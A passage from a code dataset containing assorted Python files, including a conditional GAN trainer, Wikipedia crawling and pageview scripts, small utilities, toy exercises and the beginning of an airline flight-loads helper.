Input(shape=(self.config.generator_noise_input_dim,))\r\n        label = Input(shape=(1,), dtype='int32')\r\n        label_embedding = Flatten()(Embedding(self.config.condational_label_num, self.config.generator_noise_input_dim)(label))\r\n\r\n        model_input = multiply([noise, label_embedding])\r\n        img = model(model_input)\r\n\r\n        return Model([noise, label], img)\r\n\r\n    def train(self, train_datagen, epoch, k, batch_size=256):\r\n        \"\"\"\r\n        Training loop for the CGAN.\r\n        :param train_datagen: training data generator\r\n        :param epoch: number of epochs\r\n        :param batch_size: mini-batch size\r\n        :param k: number of discriminator updates per generator update\r\n        :return:\r\n        \"\"\"\r\n        time = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\n        model_path = os.path.join(self.config.model_dir,time)\r\n        if not os.path.exists(model_path):\r\n            os.mkdir(model_path)\r\n\r\n        train_result_path = os.path.join(self.config.train_result_dir,time)\r\n        if not os.path.exists(train_result_path):\r\n            os.mkdir(train_result_path)\r\n\r\n        for ep in np.arange(1, epoch+1).astype(np.int32):\r\n            cgan_losses = []\r\n            d_losses = []\r\n            # create the progress bar\r\n            length = train_datagen.batch_num\r\n            progbar = Progbar(length)\r\n            print('Epoch {}/{}'.format(ep, epoch))\r\n            iter = 0\r\n            while True:\r\n                # once the whole dataset has been traversed, leave the while loop\r\n                #print(\"iter:{},{}\".format(iter,train_datagen.get_epoch() != ep))\r\n                if train_datagen.epoch != ep:\r\n                    break\r\n\r\n                # fetch a batch of real images and build the matching labels\r\n                batch_real_images, batch_real_labels = train_datagen.next_batch()\r\n
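                # real samples get target 1 and fakes target 0; the commented truncnorm lines below are a label-smoothing variant\r\n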
                batch_real_num_labels = np.ones((batch_size, 1))\r\n                #batch_real_num_labels = truncnorm.rvs(0.7, 1.2, size=(batch_size, 1))\r\n                # sample random noise for the generator input\r\n                batch_noises = np.random.normal(0, 1, size = (batch_size, self.config.generator_noise_input_dim))\r\n                d_loss = []\r\n                for i in np.arange(k):\r\n                    # build the fake images and their labels (reuse the real batch's class labels)\r\n                    batch_fake_num_labels = np.zeros((batch_size,1))\r\n                    #batch_fake_num_labels = truncnorm.rvs(0.0, 0.3, size=(batch_size, 1))\r\n                    batch_fake_labels = deepcopy(batch_real_labels)\r\n                    batch_fake_images = self.generator_model.predict([batch_noises,batch_fake_labels])\r\n\r\n                    # train the discriminator\r\n                    real_d_loss = self.discriminator_model.train_on_batch([batch_real_images,batch_real_labels],\r\n                                                                          batch_real_num_labels)\r\n                    fake_d_loss = self.discriminator_model.train_on_batch([batch_fake_images, batch_fake_labels],\r\n                                                                          batch_fake_num_labels)\r\n                    d_loss.append(list(0.5*np.add(real_d_loss,fake_d_loss)))\r\n                    #print(d_loss)\r\n                d_losses.append(list(np.average(d_loss,0)))\r\n                #print(d_losses)\r\n\r\n                # train the generator on a batch_size worth of noise\r\n                #batch_num_labels = truncnorm.rvs(0.7, 1.2, size=(batch_size, 1))\r\n                batch_num_labels = np.ones((batch_size,1))\r\n                batch_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)\r\n                cgan_loss = self.cgan.train_on_batch([batch_noises,batch_labels], batch_num_labels)\r\n                cgan_losses.append(cgan_loss)\r\n\r\n                # update the progress bar\r\n                progbar.update(iter, [('dcgan_loss', cgan_losses[iter]),\r\n                                      ('discriminator_loss',d_losses[iter][0]),\r\n                                      ('acc',d_losses[iter][1])])\r\n                #print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (ep, d_losses[ep][0], 100 * d_losses[ep][1],cgan_loss))\r\n                iter += 1\r\n            if ep % self.config.save_epoch_interval == 0:\r\n                model_cgan = \"Epoch{}dcgan_loss{}discriminator_loss{}acc{}.h5\".format(ep, np.average(cgan_losses),\r\n                                            np.average(d_losses,0)[0],np.average(d_losses,0)[1])\r\n                self.cgan.save(os.path.join(model_path, model_cgan))\r\n                save_dir = os.path.join(train_result_path, str(\"Epoch{}\".format(ep)))\r\n                if not os.path.exists(save_dir):\r\n                    os.mkdir(save_dir)\r\n                self.save_image(int(ep), save_dir)\r\n            '''\r\n            if int(ep) in self.config.generate_image_interval:\r\n                save_dir = os.path.join(train_result_path,str(\"Epoch{}\".format(ep)))\r\n                if not os.path.exists(save_dir):\r\n                    os.mkdir(save_dir)\r\n                self.save_image(ep,save_dir)\r\n            '''\r\n        plt.plot(np.arange(len(cgan_losses)), cgan_losses, 'b-', label='cgan_loss')\r\n        plt.plot(np.arange(len(d_losses)), [d[0] for d in d_losses], 'r-', label='d_loss')\r\n        plt.grid(True)\r\n        plt.legend(loc=\"best\")\r\n        plt.xlabel(\"Iteration\")\r\n        plt.ylabel(\"Loss\")\r\n        plt.savefig(os.path.join(train_result_path,\"loss.png\"))\r\n\r\n    def save_image(self, epoch,save_path):\r\n        \"\"\"\r\n        Save a 10x10 grid of generated images, one row per class label.\r\n        :param epoch: epoch number\r\n        :param save_path: directory the image grid is written to\r\n        :return:\r\n        \"\"\"\r\n        rows, cols = 10, 10\r\n\r\n        fig, axs = plt.subplots(rows, cols)\r\n        for i in range(rows):\r\n            label = np.array([i]*rows).astype(np.int32).reshape(-1,1)\r\n            noise = np.random.normal(0, 1, (cols, 100))\r\n            images = self.generator_model.predict([noise,label])\r\n            images = 127.5*images+127.5\r\n            cnt = 0\r\n            for j in range(cols):\r\n                #img_path = os.path.join(save_path, str(cnt) + \".png\")\r\n                #cv2.imwrite(img_path, images[cnt])\r\n                #axs[i, j].imshow(image.astype(np.int32)[:,:,0])\r\n                axs[i, j].imshow(images[cnt,:, :, 0].astype(np.int32), cmap='gray')\r\n                axs[i, j].axis('off')\r\n                cnt += 1\r\n        fig.savefig(os.path.join(save_path, \"mnist-{}.png\".format(epoch)), dpi=600)\r\n        plt.close()\r\n\r\n    def generate_image(self,label):\r\n        \"\"\"\r\n        Generate a single fake image conditioned on the given class label.\r\n        :param label: class label to condition on\r\n        \"\"\"\r\n        noise = truncnorm.rvs(-1, 1, 
size=(1, self.config.generator_noise_input_dim))\r\n label = np.array([label]).T\r\n image = self.generator_model.predict([noise,label])[0]\r\n image = 127.5*(image+1)\r\n return image\r\n","repo_name":"Daipuwei/CGAN-mnist","sub_path":"CGAN/CGAN.py","file_name":"CGAN.py","file_ext":"py","file_size_in_byte":12023,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"11347274841","text":"import wikipedia as wp\nfrom wikidata.client import Client\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\ndef get_wikidata_desc(q_number):\n\n client = Client()\n try:\n entity = client.get(q_number, load=True)\n _result = entity.description\n except:\n _result = None\n\n return _result\n\n\ndef get_page_data(page_title):\n\n try:\n page = wp.page(page_title)\n\n url = page.url\n content = requests.get(url).content\n soup = BeautifulSoup(content, 'lxml')\n try:\n q_number = soup.find('li', {'id': 't-wikibase'}).a['href'].rsplit('/')[-1]\n except:\n q_number = None\n\n return page, q_number\n\n except:\n pass\n\ndef get_authors(category_list):\n \"\"\"\n Return a list of all Wikipedia pages within a list of categories\n \"\"\"\n\n _list = []\n for i in category_list:\n _list.extend(wp.search(\"incategory:\\\"{}\\\"\".format(i), results=1000))\n _list = list(set(_list)) # only return unique values\n print(\"Found {} authors including {}...\".format(len(_list), \", \".join(_list[:7])))\n return _list\n\n\ndef strip_links(html):\n \"\"\"\n Strip all links and related text out of an html string\n \"\"\"\n\n list_nolinks = re.split('', html)\n list_nolinks = [x for x in list_nolinks if 'href=' not in x]\n str_nolinks = \"\".join(list_nolinks)\n return str_nolinks\n\n\ndef find_matches(html, check_list):\n \"\"\"\n Return a list of potential authorlinks that should be added\n \"\"\"\n\n _matched_list = []\n for i in check_list:\n try:\n _index = html.index(i)\n _matched_list.append(i)\n except:\n continue\n return _matched_list\n\n\ndef check_page_authorlinks(page_object, wp_authors):\n \"\"\"\n Returns potential missing author links\n for a given WP page title using a list of authors\n \"\"\"\n\n no_links = strip_links(page_object.html())\n list_matches = find_matches(no_links, wp_authors)\n\n title = page_object.title\n url = page_object.url\n match_count = len(list_matches)\n missing_authors = \", \".join(list_matches)\n\n if match_count > 0:\n return [title, url, match_count, missing_authors]\n else:\n return None\n\n\ndef crawl_child_authorlinks(seed_page_object, wp_authors):\n \"\"\"\n check pages for missing authorlinks including the seed page\n and all linked pages n levels_deep\n \"\"\"\n\n _result_list = []\n _links = sorted(list(set(seed_page_object.links)))\n print(\"Checking {} child pages.\".format(len(_links)))\n for i in _links:\n i_object, q_num = get_page_data(i)\n try:\n _missing = check_page_authorlinks(i_object, wp_authors)\n _result_list.append(_missing)\n except:\n pass\n\n return _result_list\n\ndef crawl_child_descriptions(seed_page_object):\n \"\"\"\n start with a seed page and crawl all child pages to fetch\n their descriptions on wikidata, which is used as a short description\n in mobile search results on wikipedia\n \"\"\"\n\n _result_list = []\n _links = sorted(list(set(seed_page_object.links)))\n print(\"Checking {} child pages.\".format(len(_links)))\n for i in _links:\n try:\n i_object, q_num = get_page_data(i)\n wikidata_desc = get_wikidata_desc(q_num)\n wikidata_page = 
\"https://www.wikidata.org/wiki/{}\".format(q_num)\n            print(\"{}: {}\".format(i_object.title, wikidata_desc))\n            _result_list.append([i_object.title, i_object.url, wikidata_desc, wikidata_page])\n        except:\n            pass\n    \n    return _result_list","repo_name":"joshnankivel/wikikit","sub_path":"utils/wp.py","file_name":"wp.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"38421196658","text":"\"\"\"\r\nGiven an integer n, return the number of trailing zeroes in n!.\r\n\r\nFollow up: Could you write a solution that works in logarithmic time complexity?\r\n\r\nInput: n = 3\r\nOutput: 0\r\nExplanation: 3! = 6, no trailing zero.\r\n\r\nExample 2:\r\n\r\nInput: n = 5\r\nOutput: 1\r\nExplanation: 5! = 120, one trailing zero.\r\n\r\n\"\"\"\r\n\r\n# fives = n / 5 + n / 25 + ...\r\n\r\ndef trailingZeroes(n: int) -> int:\r\n    zero_count = 0\r\n    while n > 0:\r\n        n //= 5\r\n        zero_count += n\r\n    return zero_count","repo_name":"ruozhengu/Leetcode","sub_path":"factorialTrailingZeros.py","file_name":"factorialTrailingZeros.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"9488958279","text":"import sqlite3\n\n# function to create a connection to the database\ndef create_connection(database):\n    conn = None\n    try:\n        conn = sqlite3.connect(database)\n    except sqlite3.Error as error:\n        print(error)\n    return conn\n","repo_name":"jonhogan/Subway_Project","sub_path":"database/database_functions/create_connection.py","file_name":"create_connection.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"40306160491","text":"import xml.etree.cElementTree as ET\nfrom xml.dom import minidom\nfrom datetime import datetime\n\n_url = \"https://wandhoven.ddns.net/RPG/denanu-dnd/\" # <-- Your website domain.\ndt = datetime.now().strftime(\"%Y-%m-%d\") # <-- Get the current date.\nsitemapFile = \"public/sitemap.xml\"\n\ndef prettify(elem):\n    \"\"\"Return a pretty-printed XML string for the Element.\n    \"\"\"\n    rough_string = ET.tostring(elem, 'utf-8')\n    reparsed = minidom.parseString(rough_string)\n    return reparsed.toprettyxml(indent=\"  \")\n\ndef generateURL(root, url, priority=\"1.0\", updatefreq=\"weekly\"):\n    doc = ET.SubElement(root, \"url\")\n    ET.SubElement(doc, \"loc\").text = _url + url\n    ET.SubElement(doc, \"lastmod\").text = dt\n    ET.SubElement(doc, \"changefreq\").text = updatefreq\n    ET.SubElement(doc, \"priority\").text = priority\n\n\ndef generate_sitemap():\n    root = ET.Element(\"urlset\")\n    \n    generateURL(root, \"monsters\")\n\n    with open(sitemapFile, \"w\") as file:\n        file.write(prettify(root))\n\ngenerate_sitemap()\n\n","repo_name":"JulianWww/denanu-dnd","sub_path":"buildSiteMap.py","file_name":"buildSiteMap.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"17329759456","text":"import urllib2\nimport os\n\ndef _get_appdata_path():\n    import ctypes\n    from ctypes import wintypes, windll\n    CSIDL_APPDATA = 26\n    _SHGetFolderPath = windll.shell32.SHGetFolderPathW\n    _SHGetFolderPath.argtypes = [wintypes.HWND,\n                                 ctypes.c_int,\n                                 wintypes.HANDLE,\n                                 wintypes.DWORD,\n                                 wintypes.LPCWSTR]\n    path_buf = ctypes.create_unicode_buffer(wintypes.MAX_PATH)\n    result = _SHGetFolderPath(0, CSIDL_APPDATA, 0, 0, path_buf)\n
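    # SHGetFolderPathW writes the user's roaming AppData directory into path_buf\n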
    return path_buf.value\n\ndef dropbox_home():\n    from platform import system\n    import base64\n    import os.path\n    _system = system()\n    if _system in ('Windows', 'cli'):\n        host_db_path = os.path.join(_get_appdata_path(),\n                                    'Dropbox',\n                                    'host.db')\n    elif _system in ('Linux', 'Darwin'):\n        host_db_path = os.path.expanduser('~'\n                                          '/.dropbox'\n                                          '/host.db')\n    else:\n        raise RuntimeError('Unknown system={}'\n                           .format(_system))\n    if not os.path.exists(host_db_path):\n        raise RuntimeError(\"Config path={} doesn't exist\"\n                           .format(host_db_path))\n    with open(host_db_path, 'r') as f:\n        data = f.read().split()\n    return base64.b64decode(data[1])\n\ndropbox_folder = os.path.join(dropbox_home(),\"Public\",\"dmp\")\nif not os.path.isdir(dropbox_folder):\n    os.makedirs(dropbox_folder)\n\ndef send(messagenum, message, dropbox_id):\n    ''' Send message with the given message num to the given id '''\n    with open(os.path.join(dropbox_folder,\"dmp{}\".format(dropbox_id)),\"wb\") as dmpfile:\n        dmpfile.write(\"{}\\n{}\".format(messagenum,message))\n    return True\n\ndef receive(receive_dropbox_id,send_dropbox_id):\n    while True:\n        try:\n            data = urllib2.urlopen(\"https://dl.dropboxusercontent.com/u/{}/dmp/dmp{}\".format(send_dropbox_id,receive_dropbox_id)).read()\n            messagenum = int(data.split(\"\\n\",1)[0])\n            message = data.split(\"\\n\",1)[1]\n            break\n        except Exception as e:\n            if isinstance(e, KeyboardInterrupt):\n                raise e\n    return messagenum, message","repo_name":"HuFlungDu/Dropbox-Messaging-Protocol","sub_path":"dmp.py","file_name":"dmp.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"11713620433","text":"from tkinter import *\nimport string\nfrom functools import partial\nimport random\n\nmain = Tk()\nmain.geometry(\"5000x400\")\nmain.title('Morse')\n\ndef symbole(l, mot):\n    m=mot.get()+l\n    mot.set(m)\ndef effacer(mot):\n    mot.set(\"\")\n\ndef trad():\n    res=inpt.get()\n    res = res.split()\n    m=\"\"\n    print(morses)\n    print(res)\n    for i in range(0,len(res)):\n        for c in range(0,26):\n            if res[i]==morses[c]:\n                m+=reallettres[c]\n                break\n    mot.set(m)\n    \n    \nmot = StringVar()\ntexte1 = Label(main, text=\"Morse\").pack()\ntextmot = Label(main, textvariable =mot).pack()\ninpt = Entry(main, width=1000)\ninpt.pack()\nphoto =[]\nbouton =[]\nreallettres=string.ascii_lowercase\nmorses = [ '.-', '-...', '-.-.','-..', '.','..-.', '--.', '....', '..','.---','-.-', '.-..', '--', '-.', '---', '.--.', '--.-', '.-.', '...', '-', '..-', '...-','.--', '-..-', '-.--', '--..']\nlettres =random.sample(reallettres,len(reallettres))\ny = 75\nx=75\nfor i in range(0,26):\n    path =\"Morse/\"+lettres[i]+\".png\"\n    photo.append(PhotoImage(file = r\"\"+path))\n    x +=220\n    if i%7==0:\n        y+=75\n        x=75\n    l= lettres[i]\n    b= Button(main, text=\"Symbol\"+str(i), image=photo[i], command= partial(symbole,l, mot)).place(x=x,y=y)\n    bouton.append(b)\nmot.set(\"\")\nboutonDechiffrage = Button(main, text=\"Translate\", command= lambda: trad()).pack()\nboutonEffacer = Button(main, text=\"Clear\", command= lambda: effacer(mot)).pack()\n\nmain.mainloop()\n","repo_name":"feaders/forge_logiciel","sub_path":"morse - Copie.py","file_name":"morse - Copie.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"74237772410","text":"import datetime\ndef most_frequent_days(year):\n    first_day = datetime.date(year, 1, 1)\n    last_day = datetime.date(year, 12, 31)\n\n    # counter\n    counter = [0] * 7 
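# one bucket per weekday, Monday=0 through Sunday=6 as returned by date.weekday()\n    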
#[monday_count, tuesday_count, ...]\n\n # count first week\n for dow in range(first_day.weekday(), 7):\n counter[dow] += 1\n\n # count last week\n for dow in range(0, last_day.weekday() + 1):\n counter[dow] += 1\n\n max_count = max(counter)\n names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n ret = []\n for dow, count in enumerate(counter):\n if count == max_count:\n ret.append(names[dow])\n\n return ret\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert most_frequent_days(2399) == ['Friday'], \"1st example\"\n assert most_frequent_days(1152) == ['Tuesday', 'Wednesday'], \"2nd example\"\n assert most_frequent_days(56) == ['Saturday', 'Sunday'], \"3rd example\"\n assert most_frequent_days(2909) == ['Tuesday'], \"4th example\"\n","repo_name":"civic/checkio","sub_path":"the-most-frequent-weekdays.py","file_name":"the-most-frequent-weekdays.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42319030941","text":"from sklearn import datasets, linear_model, model_selection, metrics\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\npd.set_option('display.max_rows', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\npri = datasets.load_boston()\n\n# doesn't have any meaning. Just handling for proficiency.\n# data_df = pd.DataFrame(data=pri.data, columns=pri.feature_names)\n# print(data_df['CHAS'].value_counts())\n# print(data_df['RAD'].value_counts(sort=False))\n# targ_df = pd.DataFrame(data=pri.target, columns=['MEDV'])\n# df = pd.concat([data_df, targ_df], axis=1)\n# print(df.describe())\n\ndata = pri.data\nlabel = pri.target\n\n# print(data.shape)\n# print(label.shape)\nlabel = label.reshape(-1, 1)\n\n# use only one feature\n# All datas always should be a matrix shape at every model.\nx = data[:, 12:13] # LSTAT\n# same as above\n# x = data[:, 12]\n# x = x.reshape(-1, 1)\ny = label\n\ntrain_x, test_x, train_y, test_y = model_selection.train_test_split(x, y, test_size=0.3, random_state=42) # random_state : set random seed (usually use 42)\n# print(train_x.shape) # 354, 1\n# print(train_y.shape)\n# print(test_x.shape) # 152, 1\n# print(test_y.shape)\n\nmodel = linear_model.LinearRegression()\n\n# train\nmodel.fit(train_x, train_y)\n\n# print(model.coef_) # weight\n# print(model.intercept_) # bias\n\n# predict\nres = model.predict(test_x)\n# print(res)\n# print(train_y)\n\n# check difference\n# for i in range(len(res)):\n# print(f\"{res[i]} {test_y[i]}\")\n\n# print(np.sqrt(np.mean((res - test_y) ** 2)))\n# print(np.sqrt(metrics.mean_squared_error(test_y, res))) # same as above\n\n# visualization\nplt.figure(figsize=(10, 10))\nplt.scatter(test_x, test_y, color='black')\nplt.scatter(train_x, train_y, color=\"red\", s=1)\nplt.plot(test_x, res, color='blue', linewidth=3)\nplt.xlabel('LSTAT')\nplt.ylabel('price')\nplt.show()","repo_name":"Park-SeungWoo/kakao-ai-study","sub_path":"ML/linear_reg/linear_reg_boston_housing.py","file_name":"linear_reg_boston_housing.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"5857579273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nCall as:\n\n MatchPageviews.py prefix pagetitles.txt XXwiki-NNNNNNNN-page.sql.gz pagecounts+++-totals.bz2 
pagecounts+++-totals.bz2, ...\n\nINPUT:\n\nprefix denotes the name used for the appropriate wiki project, e.g. 'en.z' for en.wikipedia (note this is different from the normal dumps, which just use 'en')\n'The project is one of b (wikibooks), k (wiktionary), n (wikinews), o (wikivoyage), q (wikiquote), s (wikisource), v (wikiversity), z (wikipedia).'\n\npagetitles.txt gives the page titles (spaces are substituted for _, and cgi-escapes done). Any text before the last tab is taken as a row name, to output\nany number of pagecounts files can be provided, and the page visits in each file added to the output. In particular, you might want to pass in a list of\npagetitles as generated by OTT_2_Wikidata.py (see example below)\n\nXXwiki-NNNNNNNN-page.sql.gz is the SQL database dump, from http://dumps.wikimedia.org/ (listed as Base per-page data (id, title, old restrictions, etc).)\nThis should match the wiki denoted by the 'prefix' value. So for instance if you put prefix = 'en.z', you should use an sql page dump of the enlish wikipedia\nsuch as https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-page.sql.gz\n\nThe pagecount files per month are probably the most sensible, and can be obtained from http://dumps.wikimedia.org/other/pagecounts-ez/merged/. The per-month files\nend in totals.bz2\n\nOUTPUT:\n\nyou might want to take a quick look at the top rated taxa. For example, if a single pageview file is given then you can look at the 3rd column\n\nsort -k 3,3nr -t$'\\t' popularity.txt | less\n\nor for something more complicated, use R\n\n> dat <- read.delim(\"popularity.txt\")\n> viewcols <- grep('bz2',names(dat))\n> dat$trmeanMonthlyPageviews <- apply(dat[,viewcols],1,function(x) mean(sort(x, TRUE)[-1:-2])) #trim off the top 2 months, to kill spikes\n> dat[order(dat$trmeanMonthlyPageviews, decreasing=TRUE),][1:40,-viewcols]\n> dat[order(dat$page_size, decreasing=TRUE),][1:40,-viewcols]\n> dat[order(dat$trmeanMonthlyPageviews*dat$page_size, decreasing=TRUE),][1:40,-viewcols]\n\nEXAMPLES:\n\nOneZoomTouch/server_scripts/OTT_2_Wikidata.py ott/taxonomy.tsv wikidumps/wikidata-20151005-all.json.gz enwiki > map_file.txt\ncut -f 1,4 map_file.txt | sort -n | uniq | MatchPageSizeAndViews.py en.z - wikidumps/enwiki-latest-page.sql.gz wikidumps/pagecounts-*totals.bz2 > OneZoomTouch/popularity.txt\n\n'''\n\nimport sys\nimport csv\nimport re\nimport resource\nimport fileinput\nimport collections\nimport urllib.parse\n\ndef warn(*objs):\n print(*objs, file=sys.stderr)\n\ndef memory_usage_resource():\n import resource\n rusage_denom = 1024.\n if sys.platform == 'darwin':\n # ... it seems that in OSX the output is different units ...\n rusage_denom = rusage_denom * rusage_denom\n mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom\n return mem\n\ndef sensible_sum(l):\n '''Treat None as NA, e.g. if l==[] or l == [None, None] return None'''\n l = [x for x in l if x is not None]\n if len(l):\n return sum(l)\n else:\n return None\n\ndef strNone(x):\n return str(x) if x is not None else ''\n\nif len(sys.argv) < 4:\n sys.exit('Provide the name of a wiki project (e.g. 
en.z, or en.b) as the first argument, the name of a titles file as the second, and pagecounts files as further args')\n\nlinetitles={}\n\n#we collect the original lines in the tsv file in each element of 'lines', the page size data in each element of 'pagesize' and \n# the vector of view stats in arrays stored in each element of 'pageviews'\nlines = []\npagesize = []\npageviews = []\ntitle_col=-1 #the column in the tsv file which contains the wiki title (default = last column)\n\npageview_files = collections.OrderedDict()\nfor fn in sys.argv[4:]:\n if fn not in pageview_files: #make unique\n pageview_files[fn]=len(pageview_files)\ntry:\n title_file = fileinput.input(sys.argv[2])\nexcept IOError as e:\n sys.exit(\"I/O error reading list of page titles ({0}): {1}\".format(e.errno, e.strerror))\n \nfor line in title_file:\n if (title_file.filelineno() % 500000 == 0):\n warn(\"{} entries read from title file: mem usage {} Mb\".format(title_file.filelineno(), memory_usage_resource()))\n line = line.rstrip('\\r\\n')\n lines.append(line)\n if title_file.isfirstline():\n \n pagesize.append(\"page_size\")\n pageviews.append(list(pageview_files.keys())) #headers\n else:\n wikititle = line.rsplit(\"\\t\",1)[title_col] #assume 2nd item in each row is the page title\n pagesize.append(None)\n if wikititle != \"\":\n wikititle = wikititle.replace(\" \",\"_\")\n linetitles[wikititle] = len(lines)-1\n pageviews.append([None] * len(pageview_files))\n else:\n pageviews.append([])\nwarn(\"Done: {} entries read.\".format(len(lines)))\n\ntry:\n import gzip\n import csv #use csv reader as it copes well e.g. with escaped SQL quotes in fields etc.\n pagelen_file = csv.reader(gzip.open(\"/Volumes/SDdisk/PageCounts/enwiki-latest-page.sql.gz\", 'rt', encoding='utf-8'), quotechar='\\'',doublequote=True)\nexcept IOError as e:\n sys.exit(\"I/O error reading sql dump of page info ({0}): {1}\".format(e.errno, e.strerror))\n#the column numbers for each datum are specified in the SQL file, and hardcoded here.\npage_table_namespace_column = 2\npage_table_title_column = 3\npage_table_pagelen_column = 12\nmatch_line = \"INSERT INTO `page` VALUES\" #pageviews have project name (ascii) followed by space, followed by uri-escaped title, followed by space, followed by integer\nfor fields in filter(lambda x: False if len(x)==0 else x[0].startswith(match_line), pagelen_file):\n if (pagelen_file.line_num % 500 == 0):\n warn(\"{} lines ({} pages) read from page info SQL file: mem usage {} Mb\".format(pagelen_file.line_num,pagelen_file.line_num*1000, memory_usage_resource()))\n field_num=0\n for f in fields:\n try:\n if f.lstrip()[0]==\"(\":\n field_num=0\n namespace = None\n title = None\n except IndexError:\n pass\n field_num+=1;\n if field_num== page_table_namespace_column:\n namespace = f\n if field_num== page_table_title_column:\n title = f\n elif field_num==page_table_pagelen_column and namespace == '0':\n try:\n pagesize[linetitles[title]] = f\n except LookupError:\n pass\n\n#page titles in the pageview dumps are uri-escaped, so we need to change the keys to escaped ones, to check against pageviews\nfor t in linetitles:\n linetitles[urllib.parse.quote(t)] = linetitles.pop(t)\n\n\nmatch_project = (sys.argv[1]+\" \").encode() #pageviews have project name (ascii) followed by space, followed by uri-escaped title, followed by space, followed by integer\ntry:\n fp = fileinput.input(pageview_files,openhook=fileinput.hook_compressed)\nexcept IOError as e:\n sys.exit(\"I/O error reading pageview dumps ({0}): {1}\".format(e.errno, 
e.strerror))\n\nold_filename = ''\nfilenum = -1\nproblem_lines = {x:[] for x in pageview_files} #there are apparently some errors in the unicode dumps\nfor line in fp:\n if (fp.filelineno() % 1000000 == 0):\n warn(\"{} entries read from pagecount file {} ({}): mem usage {} Mb\".format(fp.filelineno(), pageview_files[fp.filename()], fp.filename(), memory_usage_resource()))\n if line.startswith(match_project):\n try:\n fields = line.decode('UTF-8').rstrip('\\r\\n').split(\" \")\n pageviews[linetitles[fields[1]]][pageview_files[fp.filename()]] = int(fields[2])\n except LookupError:\n pass\n except UnicodeDecodeError:\n problem_lines[fp.filename()].append(fp.filelineno())\nfor fn,prob_lines in problem_lines.items():\n if len(prob_lines):\n warn(\"Problem decoding certain lines in {}. The following lines have been ignored: {}.\".format(fn, \", \".join([str(x) for x in prob_lines])))\n \n \nfirstline = 1\nfor line, size, vals in zip(lines, pagesize, pageviews):\n if len(pageview_files)>1:\n if firstline:\n print(\"\\t\".join([line] + [size] + vals + ['total_pageviews']))\n firstline = 0\n else:\n print(\"\\t\".join([line] + [strNone(size)] + list(map(strNone,vals)) + [strNone(sensible_sum(vals))]))\n else:\n print(\"\\t\".join([line] + [strNone(size)] + list(map(strNone,vals))))","repo_name":"OneZoom/OZtree","sub_path":"OZprivate/ServerScripts/TaxonMappingAndPopularity/Popularity/old/MatchPageSizeAndViews.py","file_name":"MatchPageSizeAndViews.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"78"} +{"seq_id":"74524279930","text":"import requests\nimport datetime\nfrom pprint import pprint\nfrom modules.config import flight_loads_endpoint, cert_path\n\n\ndef make_flight_loads_req(dept_date, flight_number, access_code, airline_code):\n \"\"\"\n Function that makes the request to api.caribbean-airlines to get the flight loads\n :param dept_date: Departure Date\n :param flight_number: Flight Number\n :param access_code: Access Code to access endpoint\n :param airline_code: \"BW\" for Caribbean Airlines\n :return:\n \"\"\"\n if \"BW\" in flight_number:\n flight_number = flight_number.replace(\"BW\", \"\").strip()\n\n data = {\n \"flight_number\": flight_number,\n \"dept_date\": dept_date,\n \"access_code\": access_code,\n \"airline_code\": airline_code,\n }\n resp = requests.post(flight_loads_endpoint, json=data, verify=cert_path)\n pprint(resp.json())\n return resp.json()\n\n\ndef get_flight_loads(df_request):\n \"\"\"\n Handles the request from DialogFlow for getting flight loads\n :param df_request: The DialogFlow request\n :return: Text string representing the flight load response\n \"\"\"\n try:\n response_list = []\n date = df_request[\"queryResult\"][\"parameters\"][\"date\"]\n date_formatted = (\n datetime.datetime.strptime(date, \"%Y-%m-%dT%H:%M:%S%z\")\n .date()\n .strftime(\"%d%m%y\")\n )\n access_code = datetime.datetime.now().strftime(\"%A\").lower()\n flight_num = df_request[\"queryResult\"][\"parameters\"][\"flight-number\"]\n flight_loads = make_flight_loads_req(\n date_formatted, flight_num, access_code, \"BW\"\n )\n if \"status\" in flight_loads and flight_loads[\"status\"] is True:\n load_list = flight_loads[\"loads\"]\n for each_flight in load_list:\n response_str = (\n f\"*{each_flight['origin']} -> {each_flight['destination']}*\\n\"\n )\n for cabins, values in each_flight[\"cabins\"].items():\n # print(cabins, values)\n if \"J\" in cabins:\n response_str += \"*Business Class*\\n\"\n 
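# NOTE: \"J\" and \"Y\" are the standard airline cabin codes (business and economy); this code assumes the API keys each flight's cabin dict by those letters.\n 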
